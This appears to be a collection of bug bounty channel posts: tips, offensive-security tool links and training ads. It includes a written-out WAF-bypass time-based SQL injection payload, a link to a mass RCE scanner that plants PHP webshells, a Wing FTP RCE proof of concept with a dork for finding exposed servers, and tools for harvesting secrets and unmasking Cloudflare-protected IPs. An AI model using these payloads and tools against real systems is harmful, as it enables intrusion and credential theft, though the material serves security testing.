Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi
When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!
Blocked Payload:
(select(0)from(select(sleep(10)))v) → 403 Forbidden
Bypass Payload:
(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)
This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.
Credit: @nav1n0x
SSTImap - Automatic SSTI detection tool with interactive interface
https://github.com/vladko312/SSTImap
Tired of switching tabs for OSINT and recon? Just join our Discord and type sudo help to unlock powerful tools in seconds!
- IP & Domain Lookup
- Email & Phone OSINT
- Subdomain Enumeration
- Reverse Image Search
- URL & Virus Scanners
- Temp Email, QR Tools, and more
You can create and play your own CTF in a minute, right inside Discord!
Try it out now - it's fast, simple, and all in one chat.
https://discord.gg/u7uMFV833h
#ctf #bugbounty #osint #cybersecurity #discordtools #infosec
A comprehensive bug bounty methodology compiled from extensive research, covering web application reconnaissance, checklists, and methods for identifying various bugs. This guide aims to help bug hunters improve their skills in finding, verifying, and responsibly reporting security vulnerabilities.
Download: https://github.com/alihussainzada/BugHunterMethodology/
CloakQuest3r - Uncover the true IP address of websites safeguarded by Cloudflare & Others
https://github.com/spyboy-productions/CloakQuest3r
Scanning GitHub repos is a great way to find juicy information, secrets and credentials!
Trufflehog makes this easy.
With one scan you can find AWS keys, FTP creds, crypto keys and more!
Check this out - https://github.com/trufflesecurity/trufflehog
Multi-target unauthenticated RCE scanner for CVE-2025-34085 affecting WordPress Simple File List plugin. Uploads, renames, and triggers PHP webshells across large target sets.
https://github.com/ill-deed/CVE-2025-34085-Multi-target
CVE-2025-47812: Wing FTP Server Remote Code Execution (RCE) vulnerability
PoC: https://github.com/4m3rr0r/CVE-2025-47812-poc
Dorks:
HUNTER: product.name="Wing FTP Server"
New Batch Starting - August 2025
Brut Practical Web Penetration Testing (bPWP)
We're back with a fresh batch of our most in-demand training, Brut Practical Web Penetration Testing, starting this August!
Learn the art of Web Hacking with:
- 100% Practical Sessions
- Bug Bounty Approach
- Real-World Lab Scenarios
- Lifetime Community Access
- Beginner-Friendly with Advanced Techniques
Ideal for aspiring bug bounty hunters, cybersecurity students, and VAPT professionals.
Limited Seats - Enroll Now
https://brutsec.com/bPWP
For Queries:
Telegram: @wtf_brut
WhatsApp: https://wa.link/brutsecurity | +918945971332
Email: [email protected]
AllForOne allows bug bounty hunters and security researchers to collect all Nuclei YAML templates from various public repositories.
https://github.com/AggressiveUser/AllForOne
SpoofProof helps security professionals detect email domain spoofing vulnerabilities and validate DMARC, SPF, and DKIM configurations, making email security assessments seamless and efficient.
Extension Name: SpoofProof - Domain Spoofing Validation
BApp Store: https://portswigger.net/bappstore/a321360c6e114b3dab6f2c67d68c241a
Source Code: https://github.com/portswigger/spoofproof
BrutDroid 2.0 is a powerful, Windows-optimized toolkit designed specifically for Android Studio, streamlining the setup of a mobile penetration testing lab. Built to make Android pentesting effortless, it automates emulator creation, rooting, Frida server setup, and Burp Suite certificate installation. With a vibrant new UI and support for custom Frida scripts, BrutDroid empowers security researchers to focus on testing, not setup. Linux support is coming soon!
https://github.com/Brut-Security/BrutDroid
Don't forget to leave a star :)